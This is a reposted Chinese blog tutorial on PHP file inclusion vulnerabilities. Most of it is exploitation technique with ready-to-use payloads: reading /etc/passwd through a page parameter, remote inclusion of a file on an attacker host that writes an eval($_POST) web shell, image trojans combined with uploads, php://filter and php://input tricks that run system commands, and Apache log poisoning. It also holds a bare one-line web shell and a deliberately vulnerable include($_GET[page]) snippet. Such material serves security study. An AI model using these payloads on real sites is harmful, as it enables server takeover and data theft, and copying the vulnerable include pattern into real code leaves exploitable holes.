文件包含漏洞

最新推荐文章于 2021-11-19 20:49:09 发布
最新推荐文章于 2021-11-19 20:49:09 发布
阅读量140 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/hou159656/p/8933010.html
版权

在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。

HP常见的导致文件包含的函数如下:include(),include_once(),require(),require_once(),fopen(),readfile() 
使用前4个函数包含一个新的文件时,只要文件内容符合PHP语法规范,那么任何扩展名都可以被PHP解析。包含非PHP语法规范源文件时,将会暴露其源代码。

要想成功利用文件包含漏洞,需要满足下面两个条件:
1.include()等函数通过动态变量的方式引入需要包含的文件。
2.用户能够控制该动态变量

二、远程文件包含
如果PHP的配置选项allow_url_include为ON的话,则include/require函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞。

三、本地文件包含的利用技巧

1.读取敏感文件
访问URL:http://www.xxser.com/index.php?page=/etc/passwd
如果目标主机文件存在,并且有相应的权限,那么就可以读出文件的内容。反之,就会得到一个类似于;open_basedir restriction in effect的警告。
2.远程包含Shell
如果目标主机allow_url_fopen选项是激活的,就可以尝试远程包含一句话木马,如:http://www.attacker.com/echo.txt,代码如下:
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xxser]);?>");?>
访问:http://www.example.com/index.php?page=http://www.attacker.com/echo.txt。将会在index.php所在的目录下生成shell.php,内容为:
<?php eval($_POST[xxser]);?>
3.本地包含配合文件上传
假设已经上传一句话图片木马到服务器,路径为:/uploadfile/xxx.jpg
图片代码如下:<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xxser]);?>");?>
访问URL:http://www.example.com/index.php?page=./uploadfile/xxx.jpg,包含这张图片,将会在index.php所在的目录下生成shell.php。
4.使用PHP封装协议
4.1 使用封装协议读取PHP文件
例子如下:http://www.example.com/index.php?page=php://filter/read=convert.base64-encode/resource=config.php
访问URL,得到经过Base64加密后的字符串,这段代码就是Base64加密过后的PHP源代码,解密后就可得到原本的“样貌”。
4.2 写入PHP文件
在allow_url_include为On时,构造URL:http://www.example.com/index.php?page=php://input,并且提交数据为:<?php system('net user');?>
会得到net user命令的结果。
5.包含Apache日志文件
本地文件包含的利用。
Apache有两个日志文件:access.log(访问日志)和error.log(错误日志)。
攻击者先访问http://www.example.com/<?php phpinfo();?>,操作这一步时,需要Burp,否则<,>,空格都会被转码。
随后访问http://www.xxser.com/index.php?page=./../Apache-20/logs/access.log
使用这种方式时,找到Apache的路径是关键。

图片木马一般不会被web杀毒软件查出来。

 

一句话木马
           <?php @eval($_POST['c']);?> 
<meta http-equiv="content-type" content="text/html;charset=utf-8">
include "$_GET[pate]";
<?php
echo '<meta http-equiv="Content-Type" content="text/html;charset=utf8"/>';

 

include "$_GET[page]";
?>

 

新建 1.php文件 把一句话木马写进去 ,把文件放入网站的根目录 用?page= 111.txt 运行
http://127.0.0.1/11.php?page=ee.txt

 

php语言 问号后面表示变量
$a =$_get['page'];

 

$a ="$_get[page]";
include $a;
<?php phpinfo();?>显示配置信息

 

条件 php.ini文件中有 allow_url_include=on

 

a="加密密码"
for i in a:
print(chr(ord(i)+几),end='')

 

http://10.1.2.5:17857/cs/main.php?page=php://filter/read=convert.base64-encode/resource=main.php

 

转载于:https://www.cnblogs.com/hou159656/p/8933010.html

a97109565
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件包含漏洞】——文件包含漏洞入门
weixin_45588247的博客
08-01 1276
文章目录一、实验目的:二、工具:三、实验环境:四、漏洞说明:1. 什么是文件包含?2. 漏洞成因:3. 文件包含相关的四个函数:4. 漏洞原理:5. 文件包含漏洞的形成,需要满足两个条件:6. 文件包含漏洞危害:7. 文件包含各个脚本代码:六、文件类型:1. 本地文件包含(LFI):1.2 常见的敏感信息路径:2. 远程文件包含(RFI):2.1 原理:五、环境准备:1. 文件包含的两个重要的php参数:2. 修改`php.ini`配置文件:3. 虚拟机关闭window系统的安全中心的病毒实时防护:六、实验
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
通达OA v11.8 getway.php 远程文件包含漏洞.md
最新发布
09-07
通达OA漏洞合集
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞是Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
08_理论8_文件包含漏洞的原理与实践_20180921
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
PHP 网络开发详解之远程文件包含漏洞
12-18
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。 复制代码 代码如下: <?php $file_name = $_GET[“filename”]; //获得当前文件名 include(“$file_name “); //包含文件 //一些其他...
CVE-2019-3394:[Confluence]敏感信息泄露漏洞
公众号shadow sock7
09-03 2077
这次没咋分析: https://mp.weixin.qq.com/s/puRrvfqWFVKvQ0hOoVs8lQ 写了一个poc: https://github.com/shadowsock5/Poc/tree/master/Confluence ,需要修改: url、用户名、密码、你自己的空间名 然后切换payload,改一下数字就行了。 最后confluence是加了一个过滤函数,判断...
文件包含漏洞之——防御措施
wsnbbz的博客
03-04 3828
设置白名单 代码在进行文件包含时,如果文件名可以确定,可以设置白名单对传入的参数进行比较。 过滤危险字符 由于Include/Require可以对PHP Wrapper形式的地址进行包含执行(需要配置php.ini),在Linux环境中可以通过”…/…/”的形式进行目录绕过,所以需要判断文件名称是否为合法的PHP文件。 设置文件目录(配置php.ini) PHP配置文件中有open_basedir...
1.文件包含漏洞
qq_51478862的博客
11-19 750
一,什么是文件包含漏洞 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。 例如: <php require $_GET['filename'];?php> 总结:要想成功利用文件包含漏洞,需要满足两个条件 1,要有文件包含函数并且通过动态变量的方式引入需要包含的文件 2,用户能够控制该动态变量 php中常
php的ord函数——解决中文字符截断问题
foxman209的专栏
11-26 8579
两个函数是这样定义的: ord() 函数 php string 函数 定义和用法 ord() 函数返回字符串第一个字符的 ascii 值。 语法 ord(string)参数 描述 string 必需。要从中获得 ascii 值的字符串。 试一下: echo ord('我'); 这里只能返回230, 我是以u8保存的文件并输出的, 它得到的只有230, 而230转换成hex是e6
PHP文件包含漏洞深度解析
文件包含漏洞的原理及特点:当应用程序允许用户控制包含文件的路径时,就可能出现文件包含漏洞。攻击者可以通过构造特定的输入,使得程序包含攻击者指定的文件,这可能是服务器上的任意文件,甚至远程服务器上的文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值